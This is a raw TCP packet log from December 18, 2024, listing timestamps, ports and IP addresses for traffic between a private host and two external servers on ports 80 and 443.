Dec 18, 2024 13:38:27.606549025 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.606585979 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.606611013 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.606637001 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.608299971 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.608359098 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.608467102 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.608520985 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.609466076 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.609524012 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.609642982 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.609695911 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.610889912 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.610948086 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.611047983 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.611113071 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.612381935 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.612441063 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.612490892 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.612539053 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.613781929 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.613842964 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.613905907 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.613964081 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.615281105 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.615343094 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.615351915 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.615406036 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.634196043 CET	49713	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:27.645837069 CET	49713	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:27.645862103 CET	49713	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:27.645941019 CET	443	49713	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:27.657911062 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.657927036 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.657938004 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.657951117 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.657964945 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.657988071 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.658014059 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.690521955 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.690538883 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.690551996 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.690566063 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.690578938 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.690622091 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.690692902 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.690931082 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.690946102 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.690958023 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.690970898 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.690989971 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.691034079 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.691036940 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.691049099 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.691081047 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.691095114 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.691894054 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.691909075 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.691942930 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.691956043 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.691972017 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.691977978 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.691999912 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.692020893 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.692790985 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.692806005 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.692819118 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.692832947 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.692848921 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.692853928 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.692862988 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.692868948 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.692887068 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.692907095 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.692923069 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.693779945 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.693845987 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.693867922 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.693881989 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.693897009 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.693912029 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.693913937 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.693926096 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.693926096 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.693948030 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.693969011 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.694622040 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.694643974 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.694658995 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.694677114 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.694696903 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.695888042 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.695902109 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.695914984 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.695929050 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.695951939 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.695967913 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.696536064 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.696551085 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.696563005 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.696578026 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.696589947 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.696592093 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.696604967 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.696614027 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.696697950 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.697423935 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.697495937 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.697544098 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.697612047 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.697653055 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.697730064 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.698528051 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.698548079 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.698566914 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.698584080 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.698596954 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.698615074 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.698616982 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.698632002 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.698663950 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.698695898 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.699235916 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.699250937 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.699292898 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.699321032 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.699587107 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.699600935 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.699641943 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.699657917 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.700490952 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.700520992 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.700534105 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.700562000 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.701881886 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.701930046 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.701980114 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.702020884 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.703416109 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.703473091 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.703528881 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.703577042 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.705071926 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.705121994 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.705136061 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.705177069 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.780704975 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.780771017 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.780785084 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.780839920 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.781086922 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.781138897 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.781653881 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.781667948 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.781730890 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.782390118 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.782449961 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.782490969 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.782542944 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.783552885 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.783590078 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.783627033 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.783679008 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.784691095 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.784744024 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.784823895 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.784873009 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.785763979 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.785821915 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.785968065 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.786020041 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.787086964 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.787138939 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.787166119 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.787220001 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.788132906 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.788189888 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.788227081 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.788271904 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.789203882 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.789249897 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.789333105 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.789396048 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.790363073 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.790435076 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.790472031 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.790515900 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.791482925 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.791538954 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.791615963 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.791660070 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.792687893 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.792742014 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.792768002 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.792901039 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.793732882 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.793778896 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.793941975 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.793984890 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.795008898 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.795062065 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.795125961 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.795172930 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.796082973 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.796120882 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.796133041 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.796169996 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.797164917 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.797229052 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.797266960 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.797317982 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.798320055 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.798372030 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.798438072 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.798499107 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.799546957 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.799606085 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.799732924 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.799786091 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.800568104 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.800616980 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.800652027 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.800700903 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.801750898 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.801800966 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.801837921 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.801888943 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.803006887 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.803077936 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.803105116 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.803153992 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.804163933 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.804214954 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.804244995 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.804291010 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.805242062 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.805293083 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.805360079 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.805413008 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.806224108 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.806277037 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.806333065 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.806384087 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.807369947 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.807424068 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.807493925 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.807559013 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.808629036 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.808640957 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.808693886 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.809654951 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.809729099 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.809731007 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.809777975 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.810776949 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.810832024 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.810902119 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.810951948 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.811913967 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.811969995 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.812035084 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.812086105 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.813102961 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.813169956 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.813182116 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.813219070 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.814414978 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.814472914 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.814501047 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.814548969 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.815371990 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.815421104 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.815428972 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.815475941 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.816499949 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.816553116 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.816586018 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.816637993 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.817816019 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.817830086 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.817863941 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.817890882 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.818726063 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.818777084 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.818900108 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.818950891 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.819938898 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.819952011 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.819989920 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.820033073 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.821146011 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.821158886 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.821212053 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.822114944 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.822174072 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.822220087 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.822271109 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.823367119 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.823380947 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.823446989 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.824423075 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.824477911 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.824493885 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.824541092 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.825520992 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.825577974 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.825618029 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.825670004 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.826610088 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.826667070 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.826694965 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.826744080 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.827811003 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.827866077 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.828115940 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.828169107 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.828883886 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.828955889 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.828989029 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.829035044 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.830224991 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.830351114 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.830375910 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.830512047 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.831285954 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.831353903 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.831360102 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.831412077 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.832175016 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.832242012 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.832309008 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.832365036 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.833307028 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.833372116 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.833417892 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.833501101 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.834568024 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.834645033 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.834688902 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.834747076 CET	49712	80	192.168.2.8	31.41.244.11
